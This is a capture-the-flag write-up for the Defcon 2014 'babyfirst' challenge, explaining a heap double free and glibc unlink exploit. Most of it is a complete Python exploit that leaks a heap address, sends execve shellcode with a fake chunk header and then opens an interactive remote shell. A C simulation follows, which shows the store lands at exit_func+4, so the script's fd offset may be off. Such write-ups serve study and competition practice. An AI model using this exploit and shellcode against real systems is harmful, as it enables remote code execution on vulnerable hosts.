[Defcon 2014] babyfirst - double free bug
The goal of exploiting a double free bug (DFB) is an arbitrary write: getting the allocator to store a value of your choosing at an address of your choosing. (This was my first time running into it, and it is a very fun technique, lol.)
Use the heap overflow to corrupt the neighbouring chunk's header and plant a fake chunk there (PREV_INUSE bit, fd, bk).
- Set the PREV_INUSE bit to 1 so the existing chunk is not consolidated with its predecessor, and make the next free() perform the fd/bk write (the unlink of the fake chunk).
#!/usr/bin/python
# Python 2 exploit client for babyfirst (Defcon 2014 quals).
from socket import *
import time
from struct import *

p = lambda x: pack("<L", x)          # pack a 32-bit little-endian value
up = lambda x: unpack("<L", x)[0]    # unpack a 32-bit little-endian value

cnt = 0   # counter for numbering received messages
log = 0   # set to 1 to echo all traffic

def u(str):
    # receive byte by byte until the marker `str` has been seen
    global sk
    data = ''
    while str not in data:
        data += sk.recv(1)
    if log != 0:
        print data
    return data

def r():
    # receive whatever is pending after a short pause
    time.sleep(0.1)
    global sk
    data = sk.recv(4096)
    if log != 0:
        print data
    return data

def pu(str):
    # receive until marker and print it with a running count
    global cnt
    data = u(str)
    print data
    print 'cnt', cnt
    cnt += 1
    return data

def pr():
    # receive pending data and print it with a running count
    global cnt
    s = r()
    print s
    print 'cnt', cnt
    cnt += 1
    return s

stream = ''   # everything sent so far, kept for debugging

def s(str):
    # send `str`, warning if it contains a NUL byte (fgets/strcpy-style readers stop there)
    #time.sleep(0.1)
    if str.find("\x00") != -1:
        print "NULL"
    if log != 0:
        print str
    global stream
    stream += str
    global sk
    return sk.send(str)

IP = '1.1.1.5'
PORT = 1234
sk = socket(2, 1)   # AF_INET, SOCK_STREAM
sk.connect((IP, PORT))

# The banner lists every allocated object as "[... loc=0x...]"; the object we get to
# write into (size 260) is the 12th "loc=" entry, and its address is where our data lands.
heap = u('Write to object [size=260]:\n')
heap = heap.split('loc=')[11]
heap = heap[:heap.find(']')]
heap = int(heap, 16)

# jmp +0x20 over the start of the NOP sled (unlink's second store, BK->fd = FD, lands inside
# the first bytes of this buffer because bk points here), then execve("/bin//sh").
shellcode = "\xeb\x20" + "\x90"*100 + "\x31\xC0\x50\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x50\x53\x89\xE1\x99\xB0\x0B\xCD\x80\xC2"
buf = 'A'*(260-len(shellcode))
exit_func = 0x804C8AC   # pointer called on exit, the target of the unlink write

payload = ''
payload += shellcode          # data: 260 bytes total ...
payload += buf                # ... padded with 'A' up to 260
payload += p(1)               # chunk2 size field: size 0 with PREV_INUSE set
payload += p(exit_func-8)     # fake fd: unlink does FD->bk = BK
payload += p(heap)            # fake bk: value written, and unlink does BK->fd = FD

s(payload + '\n')
r()
r()
# interactive shell
while 1:
    s(raw_input('$') + '\n')
    pr()
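The fake fd/bk above only matter because of the allocator's unlink macro, so here is an added C simulation (my code, not the write-up's exploit or the challenge binary) of unlink() on the 32-bit glibc chunk layout (prev_size, size, fd, bk at offsets 0, 4, 8, 12) in the era before the FD->bk == P / BK->fd == P check. It models the process memory as a byte array so that nothing is dereferenced for real, assumes `heap` is the user pointer printed as loc= (a constructed value, 0x0804d008) and reuses the write-up's exit_func 0x804C8AC. The two stores are *(fd+12) = bk and *(bk+8) = fd: with fd = exit_func - 8 the first store lands at exit_func + 4, and the second clobbers bytes 8..11 of the shellcode buffer, which is what the leading `\xeb\x20` jump hops over. To land the store on exit_func itself, fd has to be target - 12, which `fd_for_target()` computes.

```c
#include <assert.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Simulated 32-bit process memory: a flat byte array indexed by (addr - BASE).
   The range covers both the constructed exit_func location and the constructed heap chunk. */
#define BASE      0x0804c000u
#define MEM_SIZE  0x4000u
static uint8_t mem[MEM_SIZE];

static uint32_t rd32(uint32_t addr) {
    assert(addr >= BASE && addr + 4 <= BASE + MEM_SIZE);
    uint32_t v;
    memcpy(&v, &mem[addr - BASE], 4);
    return v;
}

static void wr32(uint32_t addr, uint32_t v) {
    assert(addr >= BASE && addr + 4 <= BASE + MEM_SIZE);
    memcpy(&mem[addr - BASE], &v, 4);
}

/* 32-bit glibc malloc_chunk header offsets. */
enum { OFF_PREV_SIZE = 0, OFF_SIZE = 4, OFF_FD = 8, OFF_BK = 12 };

/* What a size field of 1 decodes to: chunk size 0 with the PREV_INUSE bit set. */
static uint32_t chunksize(uint32_t size_field)  { return size_field & ~7u; }
static uint32_t prev_inuse(uint32_t size_field) { return size_field & 1u; }

/* unlink(P) as in pre-2.3.4 glibc, without the "corrupted double-linked list" check:
   FD = P->fd; BK = P->bk; FD->bk = BK; BK->fd = FD; */
static void unlink_chunk(uint32_t p) {
    uint32_t fd = rd32(p + OFF_FD);
    uint32_t bk = rd32(p + OFF_BK);
    wr32(fd + OFF_BK, bk);   /* store #1: *(fd + 12) = bk  (the controlled write) */
    wr32(bk + OFF_FD, fd);   /* store #2: *(bk + 8)  = fd  (side-effect write into bk) */
}

/* fd value that makes store #1 hit exactly `target`. */
static uint32_t fd_for_target(uint32_t target) { return target - OFF_BK; }

struct unlink_result {
    uint32_t store1_addr, store1_val;   /* where FD->bk = BK landed and what it wrote */
    uint32_t store2_addr, store2_val;   /* where BK->fd = FD landed and what it wrote */
};

/* Lay out the tail of the exploit payload: 260 data bytes at `heap`, then the fake chunk2
   header (size = 1, fd, bk). chunk1 is 264 bytes including its header, so chunk2's header
   starts at heap + 256 (its prev_size field overlaps the last 4 data bytes). Then run the
   unlink that free() would perform on that chunk and report both stores. */
static struct unlink_result run_fake_unlink(uint32_t heap, uint32_t fake_fd, uint32_t fake_bk) {
    memset(mem, 0, sizeof mem);
    uint32_t p = heap + 256;
    wr32(p + OFF_SIZE, 1);             /* size 0 | PREV_INUSE, as p(1) in the payload */
    wr32(p + OFF_FD, fake_fd);
    wr32(p + OFF_BK, fake_bk);
    unlink_chunk(p);
    struct unlink_result r = {
        fake_fd + OFF_BK, rd32(fake_fd + OFF_BK),
        fake_bk + OFF_FD, rd32(fake_bk + OFF_FD),
    };
    return r;
}

int main(void) {
    const uint32_t heap = 0x0804d008u;      /* constructed: the loc= of the 260-byte object */
    const uint32_t exit_func = 0x804C8ACu;  /* from the write-up */

    printf("size field 1: chunksize=%u prev_inuse=%u\n", chunksize(1), prev_inuse(1));

    struct unlink_result r = run_fake_unlink(heap, exit_func - 8, heap);
    printf("fd = exit_func-8: store1 *(0x%08x) = 0x%08x (exit_func%+d)\n",
           r.store1_addr, r.store1_val, (int)(r.store1_addr - exit_func));
    printf("                  store2 *(0x%08x) = 0x%08x (heap+%u, inside the shellcode)\n",
           r.store2_addr, r.store2_val, r.store2_addr - heap);

    r = run_fake_unlink(heap, fd_for_target(exit_func), heap);
    printf("fd = exit_func-12: store1 *(0x%08x) = 0x%08x (exit_func%+d)\n",
           r.store1_addr, r.store1_val, (int)(r.store1_addr - exit_func));
    return 0;
}
```

The second store is the reason the value written (bk) has to be a writable address: unlink always writes fd back into bk + 8, so pointing bk at the shellcode buffer both delivers the pointer and corrupts four bytes near its start.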
I would appreciate it if you point out any mistakes.